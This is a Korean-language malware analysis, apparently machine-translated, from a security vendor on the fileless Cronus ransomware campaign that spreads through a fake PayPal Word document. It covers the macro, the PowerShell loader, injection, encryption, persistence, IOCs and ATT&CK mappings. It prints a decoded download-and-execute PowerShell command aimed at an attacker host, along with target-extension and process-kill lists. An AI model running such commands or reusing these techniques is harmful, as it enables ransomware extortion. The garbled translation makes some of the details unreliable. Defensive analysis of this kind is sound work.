Seqrite Labs APT-Team은 최근 가짜 PayPal 미끼를 이용한 여러 캠페인을 발견했습니다. 이 캠페인은 Cronus라는 새로운 변종 랜섬웨어를 통해 전 세계 개인을 표적으로 삼고 있습니다. 이 경우, 해당 랜섬웨어는 PowerShell로 개발되었으며 디스크에 악성 콘텐츠를 기록하지 않고 메모리에서 직접 실행됩니다.
이 블로그에서는 원격 분석 과정에서 발견한 캠페인의 정교함과 기술적 세부 사항을 살펴보겠습니다. 초기 문서 페이로드부터 시작하여 이 캠페인의 여러 단계를 살펴보겠습니다. 그런 다음 악성 VBA 스크립트를 추출 및 분석하고 마지막으로 PowerShell 페이로드 반사 DLL 로딩을 사용하여 랜섬웨어를 실행합니다.
초기 발견
14년 2024월 XNUMX일, 저희 팀은 악성 문서를 발견했습니다. VirusTotal악성 내장 VBA 매크로가 포함된 파일에 사용하는 사냥 규칙에 따라 달라집니다.
초기 분석 결과, 우리는 악의적인 미끼가 영수증 문서로 알려진 단순한 영수증 문서를 모방하는 것을 목표로 한다는 것을 발견했습니다. paypal_charges.doc. 그런 다음 악성 스트림에서 악성 매크로를 추출한 후 악성 VBA가 2단계 PowerShell 기반 로더를 다운로드하고 있음을 발견했습니다. 8eef4df388f2217caec3dc26.ps1반사 로딩 기술을 사용하여 랜섬웨어 기반 DLL을 로드했습니다.
NETWALKER를 비롯한 여러 랜섬웨어 그룹은 이전에 이 기술을 사용하여 랜섬웨어를 배포했습니다.
감염 사슬
기술 분석
분석을 세 부분으로 나누어 보겠습니다.
초기 감염 – 악성 문서
저희는 초기 감염이 주로 피싱 경로를 통해 확산된 악성 Word 문서에 의해 발생했다는 것을 처음 확인했습니다. 따라서 악성 매크로 스트림을 분석하기 전에 해당 미끼의 내용을 심층적으로 분석하기로 했습니다.
해당 문서 파일은 빈 Word 문서에 불과하다는 점에서 위협 행위자의 성숙도를 잘 보여줍니다. 따라서 저희는 이 악성 문서의 악의적인 흐름을 심층 분석하고 추가 분석을 위해 신속하게 추출하기로 결정했습니다.
내장된 매크로의 작동 방식을 파악한 결과, 불필요한 주석과 변수 이름으로 인해 난독화가 심해 분석이 더욱 어렵다는 것을 발견했습니다. 그래서 VBA 매크로의 난독화를 해제하기로 했습니다. 난독화 해제된 매크로는 다음과 같습니다.
//디코딩된 Base64 명령.
IEX (New-Object Net.WebClient).DownloadString(‘hxxps[:]//eternal[.]lol/file/8e53a3e023218a9b1ef9ba1ef3b5afd191a99156b77864558d/8eef4df388f2217caec3dc26[.]jpg’);
해당 매크로가 powershell.exe를 사용하여 Base64로 인코딩된 문자열을 인수로 실행한 것은 분명했습니다. 내용을 디코딩해 보니 서버에서 XNUMX단계 페이로드를 다운로드하려 했던 것으로 드러났습니다.
두 번째 단계 – 악성 PowerShell 로더
파일 확장자는 .JPEG인데 파일 형식은 PowerShell 파일인 것을 확인했습니다. 그래서 악성 PowerShell 로더를 신속하게 분석하기로 했습니다.
예상대로 두 번째 단계는 정크 코드로 심하게 난독화되어 분석이 어렵습니다. 따라서 분석가의 편의성을 높이기 위해 정크 코드를 제거하고 정크 코드 사용 패턴을 관찰하여 PowerShell 스크립트의 난독화를 수동으로 해제하기로 했습니다.
스크립트는 다음과 같은 시퀀스 세트를 포함하는 세 겹의 정크 코드를 사용하여 난독화되었습니다.
if ($a.ProcessName -like “junkcodesequenceone”){
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
}
if ($a.ProcessName -like “junkcodesequencetwo”){
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
}
..실제 PowerShell 스크립트…
if ($a.ProcessName -like “junkcodesequencethree”){
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
...여기에 정크 코드가 있습니다...
}
실제 PowerShell 코드를 살펴보면 파일에 2바이트 배열이 포함되어 있음을 알 수 있습니다. 포함 .NET 어셈블리는 반사 로딩을 사용하여 메모리에 추가로 압축됩니다. 마지막 단계는 악성 .NET 어셈블리입니다. 포함 랜섬웨어.
최종 단계 - 악성 .NET 어셈블리
두 번째 단계에서 추출한 악성 .NET 어셈블리를 살펴보겠습니다. 추출 후, DLL을 Detect-It-Easy(DIE) 도구에 로드하여 패킹되었거나 보호된 .NET 어셈블리 파일을 식별했습니다.
우리는 첫 번째 .NET 어셈블리가 .NET Reactor를 사용하여 보호된다는 것을 발견했으므로 다음을 결정했습니다. 풀다 it 및 탐색 어셈블리 파일 추가 사용 전에, dn스파이 공구 a 자세한 코드 개요.
첫 번째 DLL 파일인 TEStxx.dll을 압축 해제한 후 로드된 어셈블리를 발견했습니다. 책임이있는 프로세스 주입을 수행합니다. 이 경우 두 번째 실행 파일인 RegSvcs.exe를 프로세스의 메모리에 주입합니다. 따라서 이제 조사 두 번째 악성 .NET 실행 파일입니다.
이 최종 실행 파일의 Main 메서드를 살펴보면 코드가 바탕 화면 변경과 같은 랜섬웨어 기반 동작과 관련된 다양한 작업을 수행하는 것을 볼 수 있습니다. 열거 특정 파일을 암호화하고 종료 중 실행 중인 프로세스.
또한, 우리는 다음과 같은 방법을 볼 수 있습니다. 트리플 암호화, 전체 암호화 재귀적 디렉토리 모양, 예외 파일 그리고 흥미로운 것들이 많이 있습니다. 따라서 이 랜섬웨어의 몇 가지 흥미로운 기능을 살펴보겠습니다.
셀프 카피
랜섬웨어 바이너리는 자체를 복사합니다. C:\사용자\ \AppData\로컬 경로에 있으며, 바이너리가 이미 존재하거나 복사된 경우, 해당 위치로 복사를 완료하면 자동으로 삭제됩니다.
열거
랜섬웨어는 로컬 디스크 드라이브를 먼저 열거한 후, 드라이브 내부에 있는 파일을 열거합니다. 또한 특정 폴더를 확인합니다. \체계\ 디렉터리를 만들고 제외합니다. 그런 다음 재귀적 디렉터리 조회를 위한 새 작업을 생성합니다.
암호화 대상 파일 유형은 아래와 같습니다.
| .마이드 | .ndf | .qry | .sdb | .sdf | .tmd | . tgz |
| .lzo | 이 .txt | .JAR | .DAT | .연락하다 | .설정 | .DOC |
| .을 Docx | . XLS | . XLSX | 는 .ppt | . Pptx | .odt | . JPG |
| .mka | .mhtml | .oqy | .PNG | .CSV | .py | .SQL |
| .indd | .cs | . Mp3 | . Mp4 | .dwg | .지퍼 | .RAR |
| . 운동 | . RTF 형식 | .BMP | .mkv | . AVI | 의 .apk | .LNK |
| .디브 | .Dec | .DIF | .mdb | . PHP는 | .ASP | . 영문 |
| .html 중에서 | .HTM | . XML | .PSD | .xla | .견습생 | |
| .대 | .divx | .iso로 | .7zip | .pdb | . 이코 | .우선권 |
| .db | .WMV | .swf | .cer | 박 | .지원 | .accdb |
| .만 | .p7c | .exif | .vss | .노골적인 | .m4a | . WMA를 |
| .ace | .arj | . Bz2 | .CAB | .gzip | .lzh | .타르 |
| .JPEG | .xz | .는 MPEG | 토렌트 | .MPG | .핵심 | .FLV |
| .시 | .합집합 | .아이뱅크 | .지갑 | . CSS | . JS | .rb |
| .crt | .xlsm | .xlsb | . 7z | .cpp | .자바 | .jpe |
| . 초기 | .얼룩 | 에서 .wps | .docm | . WAV | .3gp | . 지프 |
| .LOG | .gz | .config | .vb | .m1v | .sln | .pst |
| .obj | .xlam | .djvu | .inc | .cvs | .DBF | .티비 |
| .wpd | .점 | .dotx | .webm | .m4v | .amv | .m4p |
| .svg | .ODS | .bk | .vdi | .vmdk | .onepkg | .accde |
| .jsp | .json | .xltx | .vsdx | .uxdc | .udl | .3ds |
| .3프랑 | .3g2 | .accda | .accdc | .accdw | .adp | .일체 포함 |
| .ai3 | .ai4 | .ai5 | .ai6 | .ai7 | .ai8 | .arw |
| .ascx | .asm | .asmx | .avs | .BIN | .cfm | .dbx |
| .dcm | .dcr | .픽트 | .rgbe | .dwt | .f4v | .exr |
| .kwm | .최대 | .mda | .mde | 의 .mdf | .mdw | 이 .mht |
| .mpv | .메시지 | .myi | .nef | .odc | .geo | .스위프트 |
| .odm | .odp | .자주 | .orf | .PFX | .p12 | .pl로 |
| .pls | .안전한 | .탭 | .VBS | .xlk | .xlm | .xlt |
| .xltm | .svgz | 된 .slk | .tar.gz | 에 .dmg | .추신 | .psb |
| .tif | .rss | .KEY | .vob | .엡스피 | .dc3 | .iff |
| .고르다 | .onetoc2 | .nrw | .pptm | .팟엑스 | .포트엠 | .냄비 |
| .xlw | .xps | .xsd | .xsf | .xsl | .kmz | .accdr |
| .stm | .accdt | .ppam | .pps | .ppsm | .1cd | .p7b |
| .wdb | .sqlite | .sqlite3 | .dacpac | .zipx | .lzma | .z |
| .tar.xz | .pam | .r3d | .오바 | .1c | .디티 | .c |
| .vmx | .xhtml | .ckp | .db3 | .dbc | .dbs | .dbt |
| .dbv | .frm | .mwb | .mrg | .txt | .vbox | .wmf |
| 의 .wim | .xtp2 | .xsn | .xslt |
암호화
랜섬웨어 바이너리는 파일 크기에 따라 두 가지 유형의 암호화 방식을 사용합니다. 512KB 미만의 파일의 경우, FULL_ENCRYPT 방식은 파일을 한 번에 암호화합니다. 512KB를 초과하는 파일의 경우, TRIPLE_ENCRYPT 방식은 파일 내용을 여러 부분으로 나누어 암호화합니다. 두 방식 모두 AES 암호화 방식을 사용하여 파일을 암호화합니다.
위의 파일들을 제외하고 암호화하는 작은 EXCEPTIONAL_FILE이 추가됩니다. 암호화를 수행하는 동안 다음과 같은 이름의 파일이 포함된 랜섬웨어 경고 메시지도 생성됩니다. 크로누스.txt.
프로세스 종료
랜섬웨어 바이너리는 실행 중인 모든 프로세스를 나열한 후 메인 창을 종료하여 여러 프로세스를 종료합니다. 종료된 프로세스 목록은 다음과 같습니다.
| SQLWriter | sqbcoreservice | 버추얼박스VM | SQL에이전트 | SQL브라우저 | SQLSERV | 암호 |
| 증기 | 주올즈 | 아그네스브이씨 | 파이어폭스 설정 | 인포패스 | 동기화 시간 | VBoxSVC |
| 티버드컨피그 | 박쥐 | 더뱃64 | isqlplussvc | 마이데스크탑서비스 | mysqld를 | 오씨에스디 |
| OneNote | 엠스펍 | 마이데스크탑qos | CNTAoSMgr | 엔트르츠캔 | VM플레이어 | 신탁 |
| 시야 | powerpnt | WPS | xfssvccon | 프로세스해커 | 디벵50 | 디비에스엔엠피 |
| 엔씨에스비씨 | 뛰어나다 | 티엠리스텐 | PccNTMon | mysqld-nt | mysqld-opt | 오쿠토업디즈 |
| 오컴 | MSACCESS | msftesql | 천둥새 | Visio가 | 윈 워드 | 워드 패드 |
| mbamtray |
위의 모든 프로세스를 성공적으로 종료한 후 다시 호출합니다. 모든 드라이브 특정 파일을 추가로 열거하고 암호화하는 방법입니다.
고집
랜섬웨어 바이너리는 유명한 런키스 지속성을 위해 새 키를 추가하므로 크로누스 바이너리를 실행하는 위의 레지스트리 하이브에 RegSvcs.exe 시작에.
데이터 조작
랜섬웨어는 클립보드의 내용을 열거합니다. 클립보드에서 비트코인 주소를 찾으면 이를 공격자의 BTC 지갑 주소로 대체하고, 이 주소로 몸값을 요구합니다.
몸값 요구서에는 BTC 지갑 주소가 강조되어 있습니다., ...에 조사, 전환 밖으로 비어있다.
코드 중복
다른 악성 소프트웨어 샘플을 조사하고 연구한 결과, 이 캠페인에 사용된 DLL 인젝터인 PowerShell 로더에 있는 코드가 다음과 같이 다른 활성 파일리스 악성 소프트웨어 캠페인과 겹친다는 결론을 내릴 수 있습니다.
- 복수 쥐
- 화살 쥐
- 비동기 RAT
- 안드로메다 RAT
- 엑스웜
- NRAT
맺음말
파일리스 악성코드 변종인 크로누스 랜섬웨어는 매우 새로운 변종이며 활발하게 확산되고 있습니다. 위의 공격 방식은 현재 다양한 대상 컴퓨터에 랜섬웨어를 유포하는 데 주로 사용되는 방식입니다.
Seqrite 보호
- 스크립트.크로노스.48939.GC
- OLE.크로누스.48940.GC
- 몸값.크로누스
- 트로이 목마 인젝터
IOC
| 해시[SHA-256] | 파일 이름 |
| 69b6bc4db69680118781e7a9f2580738088930fa04884755f23904fa19e638e3 | 페이팔_요금.doc |
| 9ebf60ad31f0eb1fa303e0b00f9cc605c5013ea30771e6b14409cb70af7416cb | 페이팔_요금.doc |
| afb95b1b2092020ed98312602c300f51daca14bb3d65503df3c5ca4776027987 | ~WRL003.tmp |
| 629587e592130b86418d17d6b8cc52b6f378f39f1b5e8caa4038cfa7120b2a53 | 8eef4df388f2217caec3dc26.ps1
|
| dd78c6dc62463aba24cdbea3968cbcc1c7b97a736ef069d99d6512b10c5e91f3 | TEStxx.dll |
| 42551531be1c5abfdd24a3465788c659a038141de61976787b0862664df95aad | p000.exe
|
| URL이 |
| hxxps://eternal[.]lol/파일/ |
MITER ATT & CK
| 술책 | 기술 ID | 이름 |
| 초기 액세스 | T1566.001 | 피싱: 스피어 피싱 첨부 파일 |
| 실행 | T1204.002
T1059.001 T1059.005 |
사용자 실행: 악성 파일
명령 및 스크립팅 인터프리터: PowerShell 명령 및 스크립팅 인터프리터: Visual Basic |
| 고집 | T1547.001 | 레지스트리 실행 키/시작 폴더 |
| 방어 회피 | T1027.010 T1620 T1055.012 |
명령 난독화 반사 코드 로딩 프로세스 홀로잉 |
| 발견 | T1057 T1083 |
프로세스 발견 파일 및 디렉토리 검색 |
| 영향 | T1486 T1491.001 T1565.002 |
충격에 대비해 데이터를 암호화했습니다. 훼손: 내부 훼손 데이터 조작: 전송된 데이터 조작 |
참여자
- 수바지트 싱하
- 사트윅 람 프라키
